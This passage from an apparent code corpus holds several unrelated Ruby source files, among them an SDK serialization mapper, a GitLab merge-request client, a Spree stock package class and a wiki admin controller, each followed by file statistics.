attr_accessor :spark_object_dataset_schema
#
# Mapper for SparkObjectDataset class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'SparkObject',
type: {
name: 'Composite',
class_name: 'SparkObjectDataset',
model_properties: {
additional_properties: {
client_side_validation: true,
required: false,
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'ObjectElementType',
type: {
name: 'Object'
}
}
}
},
description: {
client_side_validation: true,
required: false,
serialized_name: 'description',
type: {
name: 'String'
}
},
structure: {
client_side_validation: true,
required: false,
serialized_name: 'structure',
type: {
name: 'Object'
}
},
schema: {
client_side_validation: true,
required: false,
serialized_name: 'schema',
type: {
name: 'Object'
}
},
linked_service_name: {
client_side_validation: true,
required: true,
serialized_name: 'linkedServiceName',
default_value: {},
type: {
name: 'Composite',
class_name: 'LinkedServiceReference'
}
},
parameters: {
client_side_validation: true,
required: false,
serialized_name: 'parameters',
type: {
name: 'Dictionary',
value: {
client_side_validation: true,
required: false,
serialized_name: 'ParameterSpecificationElementType',
type: {
name: 'Composite',
class_name: 'ParameterSpecification'
}
}
}
},
annotations: {
client_side_validation: true,
required: false,
serialized_name: 'annotations',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ObjectElementType',
type: {
name: 'Object'
}
}
}
},
folder: {
client_side_validation: true,
required: false,
serialized_name: 'folder',
type: {
name: 'Composite',
class_name: 'DatasetFolder'
}
},
type: {
client_side_validation: true,
required: true,
serialized_name: 'type',
type: {
name: 'String'
}
},
table_name: {
client_side_validation: true,
required: false,
serialized_name: 'typeProperties.tableName',
type: {
name: 'Object'
}
},
table: {
client_side_validation: true,
required: false,
serialized_name: 'typeProperties.table',
type: {
name: 'Object'
}
},
spark_object_dataset_schema: {
client_side_validation: true,
required: false,
serialized_name: 'typeProperties.schema',
type: {
name: 'Object'
}
}
}
}
}
end
end
end
end
| 30.355932 | 78 | 0.427136 |
183827cc442271328e5ade3da717e4c938d3166e | 209 | class CreateUserInterests < ActiveRecord::Migration
def change
create_table :user_interests do |t|
t.belongs_to :user
t.belongs_to :interest
t.timestamps null: false
end
end
end
| 19 | 51 | 0.698565 |
d5ea3a233da8fabace4e1b94296c46411c768527 | 2,053 | class AccountYear
attr_accessor :account, :year, :debits, :credits
def initialize(account:, year:, debits: false, credits: false)
@account = account
@year = year
@debits = debits
@credits = credits
end
def collection
@collection ||= (
# All the groups
categories = items.map { |item| item.category }.uniq
monthly = items.group_by { |item| "#{item.category_id}_#{item.date.month}" }
totally = items.group_by { |item| item.category_id }
      # For each category: [category, items per month (Jan..Dec), all items]
      categories.each_with_object({}) do |category, h|
        h[category.id] =
          [category] +
          months.map { |month| monthly.fetch("#{category.id}_#{month.month}", []) } +
          [totally.fetch(category.id, [])]
      end
)
end
def totals
@totals ||= (
monthly = items.group_by { |item| Time.zone.local(year, item.date.month) }
['Total'] + months.map { |month| monthly.fetch(month, []) } + [items]
)
end
def balances
@balances ||= (
monthly = items.group_by { |item| Time.zone.local(year, item.date.month) }
      # The last item of each month (ordered by date, then id) carries the month-end balance
      ['Balance'] + months.map do |month|
        monthly.fetch(month, []).max_by { |item| [item.date, item.id] }
      end
)
end
# At end of period
def last_year_item
@last_year_item ||= Item.where(account: account, date: Time.zone.local(year-1).all_year).order(:date, :id).last
end
def months
@months ||= (1..12).map { |month| Time.zone.local(year, month) }
end
def debit
true if @debits
end
def credit
true if @credits
end
private
def items
@items ||= (
items = Item.deep.where(account: account, date: months.first.all_year).to_a
# Items scoped by debits or credits
items = items.select { |item| item.debit.present? } if @debits
items = items.select { |item| item.credit.present? } if @credits
items
)
end
end
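# Usage sketch (hypothetical account record):
#   ledger = AccountYear.new(account: account, year: 2020, debits: true)
#   ledger.collection # => { category_id => [category, Jan items, ..., Dec items, all items] }
#   ledger.totals     # => ['Total', Jan items, ..., Dec items, all items]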
| 25.036585 | 115 | 0.590843 |
213f1f16fe9fa61e6aec8b43144780163cd372d1 | 3,419 | require 'gitlab'
# @summary
# This class wraps Gitlab::Client and provides the method implementations
# required by pdksync main to access the Gitlab API for creating merge
# requests, adding labels, and so forth.
class PdkSync::GitlabClient
# @summary
# Creates a new Gitlab::Client and logs in the user based on the
# supplied access token and the Gitlab API endpoint URL
# @param [String] access_token
# The Gitlab private access token, required to access the Gitlab API
# @param [String] gitlab_api_endpoint
# URL to the Gitlab API endpoint against which to work
def initialize(access_token, gitlab_api_endpoint)
@client = Gitlab.client(endpoint: gitlab_api_endpoint, private_token: access_token)
end
# @summary Checks if the supplied project exists on the Git hosting platform
# @param [String] project
# The full repository name, i.e. "namespace/project"
# @return [Boolean] true if the project exists, false otherwise
def repository?(project)
@client.project(project)
true
rescue Gitlab::Error::NotFound
false
end
# @summary
# Creates a new merge request (i.e. pull request) against the Gitlab
# platform
# @param [String] project
# The full project name, i.e. "namespace/project" in which to create
# the merge request
# @param [String] target_branch
# The target branch against which to create the merge request
# @param [String] source_branch
# The source branch from which to create the merge request
# @param [String] title
# The title/name of the merge request to create
# @param [String] message
# The pull request message/body
# @return
# A Gitlab merge request object for the newly created merge request
def create_pull_request(project, target_branch, source_branch, title, message)
mr_options = {
source_branch: source_branch,
target_branch: target_branch,
description: message
}
@client.create_merge_request(project, title, mr_options)
end
# @summary Gets the labels available in the project
# @param [String] project
# The full project name, i.e. "namespace/project", from which to get
# the available labels
# @return [Array] List of available labels in the project
def labels(project)
@client.labels(project)
end
# @summary Updates an existing merge request in the repository
# @note This method is specifically used to set labels for a merge request
# @param [String] project
# The full project name, i.e. "namespace/project" in which to update
# the issue
# @param [Integer] id
# The id number of the merge request to update
# @param [Hash] options
# A hash of options defining the changes to the merge request
# @return A Gitlab merge request object of the updated merge request
def update_issue(project, id, options)
# Gitlab requires labels to be supplied as a comma-separated string
labels = options[:labels].join(',')
@client.update_merge_request(project, id, labels: labels)
end
# @summary Deletes a branch in the project
# @param [String] project
# The full project name, i.e. "namespace/project" in which to delete
# the branch
# @param [String] branch_name
# The name of the branch to delete
# @return [Boolean] true on success, false on failure
def delete_branch(project, branch_name)
@client.delete_branch(project, branch_name)
end
end
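# Usage sketch (hypothetical token and self-hosted endpoint):
#   client = PdkSync::GitlabClient.new(ENV['GITLAB_TOKEN'], 'https://gitlab.example.com/api/v4')
#   if client.repository?('namespace/project')
#     client.create_pull_request('namespace/project', 'master', 'pdksync_update',
#                                'Update module', 'Automated PDK sync')
#   end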
| 37.163043 | 87 | 0.718924 |
28ccca809602ef8342377483018552a4e2f579de | 3,499 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(:default, :assets, Rails.env)
module Samson
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
#
config.autoload_paths += Dir["#{config.root}/lib/**/"]
# Add DB migrations from plugins
config.paths["db/migrate"] << config.root.join('plugins/**/db/migrate')
config.cache_store = :dalli_store, { value_max_bytes: 3000000, compress: true, expires_in: 1.day }
# Allow streaming
config.preload_frameworks = true
config.allow_concurrency = true
# Used for all Samson specific configuration.
config.samson = ActiveSupport::OrderedOptions.new
# Email prefix e.g. [PREFIX] Someone deployed PROJECT to STAGE (REF)
config.samson.email = ActiveSupport::OrderedOptions.new
config.samson.email.prefix = ENV["EMAIL_PREFIX"].presence || "DEPLOY"
config.samson.email.sender_domain = ENV["EMAIL_SENDER_DOMAIN"].presence || "samson-deployment.com"
# Whether or not jobs are actually executed.
config.samson.enable_job_execution = true
# Tired of the i18n deprecation warning
config.i18n.enforce_available_locales = true
# The directory in which repositories should be cached.
config.samson.cached_repos_dir = Rails.root.join("cached_repos")
# The Github teams and organizations used for permissions
config.samson.github = ActiveSupport::OrderedOptions.new
config.samson.github.organization = ENV["GITHUB_ORGANIZATION"].presence
config.samson.github.admin_team = ENV["GITHUB_ADMIN_TEAM"].presence
config.samson.github.deploy_team = ENV["GITHUB_DEPLOY_TEAM"].presence
config.samson.github.web_url = ENV["GITHUB_WEB_URL"].presence || 'github.com'
config.samson.github.api_url = ENV["GITHUB_API_URL"].presence || 'api.github.com'
config.samson.github.status_url = ENV["GITHUB_STATUS_URL"].presence || 'status.github.com'
config.samson.references_cache_ttl = ENV['REFERENCES_CACHE_TTL'].presence || 10.minutes
config.samson.auth = ActiveSupport::OrderedOptions.new
    config.samson.auth.github = ENV["AUTH_GITHUB"] != "0"
    config.samson.auth.google = ENV["AUTH_GOOGLE"] != "0"
    config.samson.uri = URI(ENV["DEFAULT_URL"] || 'http://localhost:3000')
self.default_url_options = {
host: config.samson.uri.host,
protocol: config.samson.uri.scheme
}
config.action_controller.action_on_unpermitted_parameters = :raise
config.after_initialize do
# Token used to request badges
config.samson.badge_token = Digest::MD5.hexdigest('badge_token' << Samson::Application.config.secret_key_base)
end
end
end
require "samson/hooks"
| 42.670732 | 116 | 0.724779 |
282c50689f96c52598491b8f60950c0db755b580 | 5,266 | # frozen_string_literal: true
module Spree
module Stock
class Package
attr_reader :stock_location, :contents
attr_accessor :shipment
# @param stock_location [Spree::StockLocation] the stock location this package originates from
# @param contents [Array<Spree::Stock::ContentItem>] the contents of this package
def initialize(stock_location, contents = [])
@stock_location = stock_location
@contents = contents
end
# Adds an inventory unit to this package.
#
# @param inventory_unit [Spree::InventoryUnit] an inventory unit to be
# added to this package
# @param state [:on_hand, :backordered] the state of the item to be
# added to this package
def add(inventory_unit, state = :on_hand)
contents << ContentItem.new(inventory_unit, state) unless find_item(inventory_unit)
end
# Adds multiple inventory units to this package.
#
# @param inventory_units [Array<Spree::InventoryUnit>] a collection of
# inventory units to be added to this package
# @param state [:on_hand, :backordered] the state of the items to be
# added to this package
def add_multiple(inventory_units, state = :on_hand)
inventory_units.each { |inventory_unit| add(inventory_unit, state) }
end
# Removes a given inventory unit from this package.
#
# @param inventory_unit [Spree::InventoryUnit] the inventory unit to be
# removed from this package
def remove(inventory_unit)
item = find_item(inventory_unit)
@contents -= [item] if item
end
# @return [Spree::Order] the order associated with this package
def order
# Fix regression that removed package.order.
# Find it dynamically through an inventory_unit.
contents.detect { |item| !!item.try(:line_item).try(:order) }.try(:line_item).try(:order)
end
# @return [Float] the summed weight of the contents of this package
def weight
contents.sum(&:weight)
end
# @return [Array<Spree::Stock::ContentItem>] the content items in this
# package which are on hand
def on_hand
contents.select(&:on_hand?)
end
# @return [Array<Spree::Stock::ContentItem>] the content items in this
# package which are backordered
def backordered
contents.select(&:backordered?)
end
# Find a content item in this package by inventory unit and optionally
# state.
#
# @param inventory_unit [Spree::InventoryUnit] the desired inventory
# unit
# @param state [:backordered, :on_hand, nil] the state of the desired
# content item, or nil for any state
def find_item(inventory_unit, state = nil)
contents.detect do |item|
item.inventory_unit == inventory_unit &&
(!state || item.state.to_s == state.to_s)
end
end
# @param state [:backordered, :on_hand, nil] the state of the content
# items of which we want the quantity, or nil for the full quantity
# @return [Fixnum] the number of inventory units in the package,
# counting only those in the given state if it was specified
def quantity(state = nil)
matched_contents = state.nil? ? contents : contents.select { |content| content.state.to_s == state.to_s }
matched_contents.map(&:quantity).sum
end
# @return [Boolean] true if there are no inventory units in this
# package
def empty?
quantity == 0
end
# @return [String] the currency of the order this package belongs to
def currency
order.currency
end
# @return [Array<Spree::ShippingCategory>] the shipping categories of the
# variants in this package
def shipping_categories
Spree::ShippingCategory.where(id: shipping_category_ids)
end
# @return [ActiveRecord::Relation] the [Spree::ShippingMethod]s available
# for this pacakge based on the stock location and shipping categories.
def shipping_methods
Spree::ShippingMethod.
with_all_shipping_category_ids(shipping_category_ids).
available_in_stock_location(stock_location)
end
# @return [Spree::Shipment] a new shipment containing this package's
# inventory units, with the appropriate shipping rates and associated
# with the correct stock location
def to_shipment
# At this point we should only have one content item per inventory unit
# across the entire set of inventory units to be shipped, which has
# been taken care of by the Prioritizer
contents.each { |content_item| content_item.inventory_unit.state = content_item.state.to_s }
Spree::Shipment.new(
order: order,
stock_location: stock_location,
inventory_units: contents.map(&:inventory_unit)
)
end
private
# @return [Array<Fixnum>] the unique ids of all shipping categories of
# variants in this package
def shipping_category_ids
contents.map { |item| item.variant.shipping_category_id }.compact.uniq
end
end
end
end
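# Usage sketch (hypothetical stock location and inventory units):
#   package = Spree::Stock::Package.new(stock_location)
#   package.add(unit_in_stock)                  # defaults to :on_hand
#   package.add(backordered_unit, :backordered)
#   package.quantity(:backordered)              # => count of backordered units
#   shipment = package.to_shipment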
| 36.825175 | 113 | 0.657045 |
33579d4ad44470fed1be1e650efce09a00429ea0 | 321 | edition_id = 644875
edition = Edition.where(id: edition_id).first
if edition.present?
edition.minor_change = true
# Skip validation here, because normally editions in a superseded state cannot
# have their minor_change field modified.
edition.save(validate: false)
else
"Edition #{edition_id} not found."
end
| 24.692308 | 80 | 0.766355 |
26f46fa1180fa33448bdc93a031fe1d223127d75 | 3,031 | module Charyf
module Utils
class Machine
DefaultExists = Class.new(ArgumentError)
NotInState = Class.new(ArgumentError)
InvalidDefinition = Class.new(LoadError)
InvalidEvent = Class.new(ArgumentError)
class << self
def state(name, default: false, final: false, action: nil, &block)
if default
raise DefaultExists.new if @_default_state
@_default_state = name
end
_states[name] = {
action: action || name,
final: final
}
if block
@_state = name
block.call
@_state = nil
end
end
def on(event, go: nil, &block)
raise NotInState.new unless @_state
_events(@_state)[event] =
{
go: go,
callback: block
}
end
def _default_state
@_default_state
end
# def _final_states
# @_final_states ||= [:_terminated]
# end
def _states
@_states ||= {
_terminated: {
action: :_terminated,
final: true
}
}
end
def _events(state)
@_events ||= Hash.new
@_events[state] ||= Hash.new
end
def build
_states.each do |state_name, state|
events = _events(state_name)
raise InvalidDefinition.new("No transitions from state #{state_name}") if events.empty? && !state[:final]
_events(state_name).each do |event, details|
raise InvalidDefinition.new("Transition '#{event}' to undefined state '#{details[:go]}'") unless _states.include?(details[:go])
end
end
raise InvalidDefinition.new('No final states defined.') unless _states.values.any? { |state| state[:final] }
end
end # End of class
attr_reader :state
      def initialize(state = nil)
        @state = state || self.class._default_state
      end
def trigger!(event, payload = nil)
raise InvalidEvent.new("No transition defined for event '#{event}' from state '#{@state}'") unless trigger?(event)
change(event, payload)
end
def trigger(event, payload = nil)
trigger?(event) && change(event, payload)
end
def trigger?(event)
self.class._events(@state).include?(event)
end
def terminate
@state = :_terminated
end
def final?
self.class._states[@state][:final]
end
def state?(state)
@state == state
end
def events
self.class._events(@state).keys
end
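      # DSL sketch (hypothetical subclass; state and event names are invented):
      #
      #   class DoorMachine < Charyf::Utils::Machine
      #     state :closed, default: true do
      #       on :open, go: :opened
      #     end
      #     state :opened do
      #       on :close, go: :closed
      #       on :lock,  go: :_terminated
      #     end
      #     build
      #   end
      #
      #   door = DoorMachine.new
      #   door.trigger!(:open) # => :opened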
private
def change(event, payload)
transition = self.class._events(@state)[event]
@state = transition[:go]
#TODO machine
callback = transition[:callback]
callback.call(payload) if callback
@state
end
end
end
end | 23.679688 | 141 | 0.533157 |
61236fac8da8ab45f2efa1fb808cd4a0308036ad | 125 | class AddUserToProf < ActiveRecord::Migration[5.1]
def change
add_reference :profs, :user, foreign_key: true
end
end
| 20.833333 | 50 | 0.744 |
ed63516e9b5a56c2b025f4175aa79b73d88e2b1d | 38 | module Draper
VERSION = "1.2.0"
end
| 9.5 | 19 | 0.657895 |
01964507a40f7d26c68cb7ac58f5706ef71a49b2 | 157 | class AddScheduleOptionToLeagues < ActiveRecord::Migration[5.0]
def change
add_column :leagues, :schedule, :integer, default: 0, null: false
end
end
| 26.166667 | 69 | 0.751592 |
62b3209df57904612161e1f82a394d13d7759477 | 333 | cask 'vuescan' do
version '9.7.19'
sha256 '549dcd2c3562f3628fae2eb4b339aec15f11a778bd3cfb59a9b00018af3ecfa1'
url "https://www.hamrick.com/files/vuex64#{version.major_minor.no_dots}.dmg"
appcast 'https://www.hamrick.com/alternate-versions.html'
name 'VueScan'
homepage 'https://www.hamrick.com/'
app 'VueScan.app'
end
| 27.75 | 78 | 0.75976 |
e8e6b772ea37e46171abf59c1a0767baa899f536 | 1,494 | module MetaTags
class Renderer
LINE_SEPARATOR = "\n"
attr_reader :template, :vendors
delegate :content_tag, :tag, to: :template
def initialize(template, vendors: nil)
@template = template
@vendors = vendors
end
def render
[
charset_tag,
title_tag,
description_tag,
keywords_tag,
vendor_tags
].compact.join(LINE_SEPARATOR).html_safe
end
private
def title_tag
if (title = meta_tags.title).present?
content_tag(:title, title)
end
end
def charset_tag
tag(:meta, charset: meta_tags.charset)
end
def description_tag
if (description = meta_tags.description).present?
tag(:meta, name: 'description', content: description)
end
end
def keywords_tag
if (keywords = meta_tags.keywords).present?
tag(:meta, name: 'keywords', content: keywords)
end
end
def vendor_tags
return unless vendors
vendor_tags = vendors.each_with_object([]) do |vendor_name, tags|
vendor_class = MetaTags::Vendors.for(vendor_name)
vendor = vendor_class.new(template)
vendor.tags.each do |tag_name|
if (value = meta_tags.send(tag_name)).present?
tags << vendor.render(tag_name, value)
end
end
end
vendor_tags.join(LINE_SEPARATOR)
end
def meta_tags
@meta_tags ||= template.controller.meta_tags_store
end
end
end
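# Usage sketch (hypothetical view context; vendor names depend on what the
# MetaTags::Vendors registry defines):
#   MetaTags::Renderer.new(view_context, vendors: [:open_graph]).render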
| 21.342857 | 71 | 0.621151 |
ab11609a3b8f3bdb4b73f54e12e2d5da7e13b1ff | 9,520 | #
# This class was auto-generated from the API references found at
# https://epayments-api.developer-ingenico.com/s2sapi/v1/
#
require 'ingenico/connect/sdk/domain/payment/bank_transfer_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/card_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/cash_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/e_invoice_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/invoice_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/mobile_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/non_sepa_direct_debit_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/order_output'
require 'ingenico/connect/sdk/domain/payment/redirect_payment_method_specific_output'
require 'ingenico/connect/sdk/domain/payment/sepa_direct_debit_payment_method_specific_output'
module Ingenico::Connect::SDK
module Domain
module Payment
# @attr [Integer] amount_paid
# @attr [Integer] amount_reversed
# @attr [Ingenico::Connect::SDK::Domain::Payment::BankTransferPaymentMethodSpecificOutput] bank_transfer_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::CardPaymentMethodSpecificOutput] card_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::CashPaymentMethodSpecificOutput] cash_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::NonSepaDirectDebitPaymentMethodSpecificOutput] direct_debit_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::EInvoicePaymentMethodSpecificOutput] e_invoice_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::InvoicePaymentMethodSpecificOutput] invoice_payment_method_specific_output
# @attr [Ingenico::Connect::SDK::Domain::Payment::MobilePaymentMethodSpecificOutput] mobile_payment_method_specific_output
# @attr [String] payment_method
# @attr [Ingenico::Connect::SDK::Domain::Payment::RedirectPaymentMethodSpecificOutput] redirect_payment_method_specific_output
# @attr [String] reversal_reason
# @attr [Ingenico::Connect::SDK::Domain::Payment::SepaDirectDebitPaymentMethodSpecificOutput] sepa_direct_debit_payment_method_specific_output
class PaymentOutput < Ingenico::Connect::SDK::Domain::Payment::OrderOutput
attr_accessor :amount_paid
attr_accessor :amount_reversed
attr_accessor :bank_transfer_payment_method_specific_output
attr_accessor :card_payment_method_specific_output
attr_accessor :cash_payment_method_specific_output
attr_accessor :direct_debit_payment_method_specific_output
attr_accessor :e_invoice_payment_method_specific_output
attr_accessor :invoice_payment_method_specific_output
attr_accessor :mobile_payment_method_specific_output
attr_accessor :payment_method
attr_accessor :redirect_payment_method_specific_output
attr_accessor :reversal_reason
attr_accessor :sepa_direct_debit_payment_method_specific_output
# @return (Hash)
def to_h
hash = super
hash['amountPaid'] = @amount_paid unless @amount_paid.nil?
hash['amountReversed'] = @amount_reversed unless @amount_reversed.nil?
hash['bankTransferPaymentMethodSpecificOutput'] = @bank_transfer_payment_method_specific_output.to_h unless @bank_transfer_payment_method_specific_output.nil?
hash['cardPaymentMethodSpecificOutput'] = @card_payment_method_specific_output.to_h unless @card_payment_method_specific_output.nil?
hash['cashPaymentMethodSpecificOutput'] = @cash_payment_method_specific_output.to_h unless @cash_payment_method_specific_output.nil?
hash['directDebitPaymentMethodSpecificOutput'] = @direct_debit_payment_method_specific_output.to_h unless @direct_debit_payment_method_specific_output.nil?
hash['eInvoicePaymentMethodSpecificOutput'] = @e_invoice_payment_method_specific_output.to_h unless @e_invoice_payment_method_specific_output.nil?
hash['invoicePaymentMethodSpecificOutput'] = @invoice_payment_method_specific_output.to_h unless @invoice_payment_method_specific_output.nil?
hash['mobilePaymentMethodSpecificOutput'] = @mobile_payment_method_specific_output.to_h unless @mobile_payment_method_specific_output.nil?
hash['paymentMethod'] = @payment_method unless @payment_method.nil?
hash['redirectPaymentMethodSpecificOutput'] = @redirect_payment_method_specific_output.to_h unless @redirect_payment_method_specific_output.nil?
hash['reversalReason'] = @reversal_reason unless @reversal_reason.nil?
hash['sepaDirectDebitPaymentMethodSpecificOutput'] = @sepa_direct_debit_payment_method_specific_output.to_h unless @sepa_direct_debit_payment_method_specific_output.nil?
hash
end
def from_hash(hash)
super
if hash.has_key? 'amountPaid'
@amount_paid = hash['amountPaid']
end
if hash.has_key? 'amountReversed'
@amount_reversed = hash['amountReversed']
end
if hash.has_key? 'bankTransferPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['bankTransferPaymentMethodSpecificOutput']] unless hash['bankTransferPaymentMethodSpecificOutput'].is_a? Hash
@bank_transfer_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::BankTransferPaymentMethodSpecificOutput.new_from_hash(hash['bankTransferPaymentMethodSpecificOutput'])
end
if hash.has_key? 'cardPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['cardPaymentMethodSpecificOutput']] unless hash['cardPaymentMethodSpecificOutput'].is_a? Hash
@card_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::CardPaymentMethodSpecificOutput.new_from_hash(hash['cardPaymentMethodSpecificOutput'])
end
if hash.has_key? 'cashPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['cashPaymentMethodSpecificOutput']] unless hash['cashPaymentMethodSpecificOutput'].is_a? Hash
@cash_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::CashPaymentMethodSpecificOutput.new_from_hash(hash['cashPaymentMethodSpecificOutput'])
end
if hash.has_key? 'directDebitPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['directDebitPaymentMethodSpecificOutput']] unless hash['directDebitPaymentMethodSpecificOutput'].is_a? Hash
@direct_debit_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::NonSepaDirectDebitPaymentMethodSpecificOutput.new_from_hash(hash['directDebitPaymentMethodSpecificOutput'])
end
if hash.has_key? 'eInvoicePaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['eInvoicePaymentMethodSpecificOutput']] unless hash['eInvoicePaymentMethodSpecificOutput'].is_a? Hash
@e_invoice_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::EInvoicePaymentMethodSpecificOutput.new_from_hash(hash['eInvoicePaymentMethodSpecificOutput'])
end
if hash.has_key? 'invoicePaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['invoicePaymentMethodSpecificOutput']] unless hash['invoicePaymentMethodSpecificOutput'].is_a? Hash
@invoice_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::InvoicePaymentMethodSpecificOutput.new_from_hash(hash['invoicePaymentMethodSpecificOutput'])
end
if hash.has_key? 'mobilePaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['mobilePaymentMethodSpecificOutput']] unless hash['mobilePaymentMethodSpecificOutput'].is_a? Hash
@mobile_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::MobilePaymentMethodSpecificOutput.new_from_hash(hash['mobilePaymentMethodSpecificOutput'])
end
if hash.has_key? 'paymentMethod'
@payment_method = hash['paymentMethod']
end
if hash.has_key? 'redirectPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['redirectPaymentMethodSpecificOutput']] unless hash['redirectPaymentMethodSpecificOutput'].is_a? Hash
@redirect_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::RedirectPaymentMethodSpecificOutput.new_from_hash(hash['redirectPaymentMethodSpecificOutput'])
end
if hash.has_key? 'reversalReason'
@reversal_reason = hash['reversalReason']
end
if hash.has_key? 'sepaDirectDebitPaymentMethodSpecificOutput'
raise TypeError, "value '%s' is not a Hash" % [hash['sepaDirectDebitPaymentMethodSpecificOutput']] unless hash['sepaDirectDebitPaymentMethodSpecificOutput'].is_a? Hash
@sepa_direct_debit_payment_method_specific_output = Ingenico::Connect::SDK::Domain::Payment::SepaDirectDebitPaymentMethodSpecificOutput.new_from_hash(hash['sepaDirectDebitPaymentMethodSpecificOutput'])
end
end
end
end
end
end
| 70.518519 | 213 | 0.772374 |
7a3a80aa6b6c26ad51f6e69deb577147f5e6c5a5 | 180 | Sequel.migration do
up do
add_column :storage_apps, :state, String, size: 50, default: 'active', null: false
end
down do
drop_column :storage_apps, :state
end
end
| 18 | 86 | 0.694444 |
26ed8cbf51e00a4d7ccab8996dd0da6fcfe8fcef | 1,406 | Pod::Spec.new do |s|
s.name = 'BBMetalImage'
s.version = '1.2.0'
s.summary = 'A Swift library for GPU-accelerated image/video processing based on Metal.'
s.description = <<-DESC
80+ built-in filters.
Filter chain supported.
Customized filter.
Camera capturing video and audio.
Depth camera supported.
Multiple camera supported.
Video source processing video file.
Image source providing image texture.
UI source recording view animation.
Metal view displaying Metal texture.
Video writer writting video.
High performance.
DESC
s.homepage = 'https://github.com/Silence-GitHub/BBMetalImage'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Kaibo Lu' => '[email protected]' }
s.platform = :ios, '10.0'
s.swift_version = '5.0'
s.source = { :git => 'https://github.com/Silence-GitHub/BBMetalImage.git', :tag => s.version }
s.requires_arc = true
s.source_files = 'BBMetalImage/BBMetalImage/*.{h,m,swift,metal}'
s.exclude_files = 'BBMetalImage/BBMetalImage/MultipleVideoSource.swift'
s.private_header_files = 'BBMetalImage/BBMetalImage/BBMetalShaderTypes.h'
end
| 33.47619 | 102 | 0.576814 |
f7be54dcac9b2eab12a20d2673e1ca50792358e9 | 3,020 | module Wikiplus
class Admin::PagesController < Admin::ApplicationController
before_action :check_abilities, except: [:index, :show]
def index
@pages = Page.where(mainpage_id: nil).order(:sortid)
@list = []
      @pages.each do |p|
        add_to_list_page p, 1
      end
end
def show
@page = Page.find(params[:id])
end
def new
@images = Image.all
@page = Page.new
end
def create
@page = Page.new(page_params)
@page.sortid = 1
if @page.save
redirect_to [:admin, @page]
      else
        logger.warn @page.errors.full_messages
        @images = Image.all # the :new template needs @images when re-rendered
        render :new
      end
end
def newsubpage
@images = Image.all
@page = Page.new(mainpage_id: params[:id])
render :new
end
def createsubpage
@images = Image.all
#params[:id] =~ /(\d+)-.*/
parent_page = Page.find(params[:id])
#logger.warn "parent=#{parent_page} params=#{params.inspect}"
new_page = Page.new(mainpage: parent_page, name_ru: params[:name_ru], name_en: params[:name_en], content_ru: params[:content_ru], content_en: params[:content_en], sortid: params[:sortid], url: params[:url])
if new_page.save
#logger.warn "Saved!"
        @page = new_page
        redirect_to [:admin, @page]
      else
        flash[:notice] = "Error: #{new_page.errors.full_messages}" # flash.now does not survive a redirect
        logger.warn "Error: #{new_page.errors.full_messages}"
        redirect_to admin_pages_path
end
end
CH_STR_REGEXP = Regexp.new('page\[(\d+)\]=(\S+)')
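    # Expected payload sketch (hypothetical): params[:relations] arrives as a
    # serialized tree, e.g. "page[3]=null&page[5]=3" (page 5 nested under page 3).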
def change_structure
result = nil
prio = 0
items = params[:relations].split('&')
logger.warn "items: #{items.inspect}"
items.each{|item|
prio += 1
item =~ CH_STR_REGEXP
page_id = $1.to_i
parent_id = $2=='null' ? nil : $2.to_i
begin
page = Page.find(page_id)
page.mainpage_id = parent_id
page.sortid = prio
page.save!
rescue => e
logger.warn "Error: #{e.message}"
result ||= ''
result += "Error: #{e.message}\n"
end
}
      render text: result || 'ok'
end
def edit
@images = Image.all
@page = Page.find(params[:id])
end
def update
@page = Page.find(params[:id])
if @page.update(page_params)
redirect_to [:admin, @page]
      else
        @images = Image.all # the :edit template needs @images when re-rendered
        render :edit
      end
end
def destroy
@page = Page.find(params[:id])
@page.destroy
redirect_to admin_pages_path
end
private
def check_abilities
authorize! :manage, :pages
end
def add_to_list_page p, level
      @list << [p.id, level]
      if p.subpages.size > 0
        p.subpages.order(:sortid).each do |subpage|
          add_to_list_page subpage, level + 1
        end
end
end
def page_params
params.require(:page).permit(*Page.locale_columns(:name, :content),:sortid, :mainpage_id, :url, :show_all, :image)
end
end
end
